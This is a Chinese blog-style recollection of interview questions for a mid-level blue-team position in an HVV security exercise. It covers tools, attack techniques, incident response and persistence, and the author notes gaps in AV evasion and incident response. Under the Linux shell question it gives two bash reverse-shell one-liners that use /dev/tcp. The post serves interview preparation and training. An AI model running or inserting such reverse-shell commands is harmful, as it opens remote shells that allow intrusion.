【面试】记一次HVV蓝队中级(面试题)
文章目录
- 使用过安全设备吗?使用过程中发现过真实攻击行为吗?
- SRC经验
- 网络攻防CTF经历
- Web OWasp Top10
- 常见webshell特征(内存马特征)
- Goby在用什么版本?(这是没想到的)
- Sqlmap参数
- Burpsuite常用插件
- MSF生成木马命令行(msfvenom 这问题也是我没想到的)
- 动态免杀(这里要补一下了,不太熟悉)
- mimikaze使用
- CS插件使用过那些
- Linux系统弹shell命令(bash命令)
- 横向移动思路
- 应急响应了解吗(流程,想法,思路)
- 一台机器装不了杀软,怎么进行排查?(手动排查)
- 自己打的内网靶场多吗?
- 权限维持思路?
- 金银票据区别?
- 自己写过的EXP多吗,使用那些库?
- 钓鱼邮件(构造思路以及分析思路)
- 反制思路
- 总结
使用过安全设备吗?使用过程中发现过真实攻击行为吗?
SRC经验
网络攻防CTF经历
Web OWasp Top10
常见webshell特征(内存马特征)
Goby在用什么版本?(这是没想到的)
Sqlmap参数
Burpsuite常用插件
MSF生成木马命令行(msfvenom 这问题也是我没想到的)
动态免杀(这里要补一下了,不太熟悉)
mimikaze使用
CS插件使用过那些
Linux系统弹shell命令(bash命令)
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1
横向移动思路
应急响应了解吗(流程,想法,思路)
一台机器装不了杀软,怎么进行排查?(手动排查)
自己打的内网靶场多吗?
权限维持思路?
金银票据区别?
自己写过的EXP多吗,使用那些库?
钓鱼邮件(构造思路以及分析思路)
反制思路
总结
动态免杀方面需要补一下、应急响应方面知识没有构成系统,讲的有点乱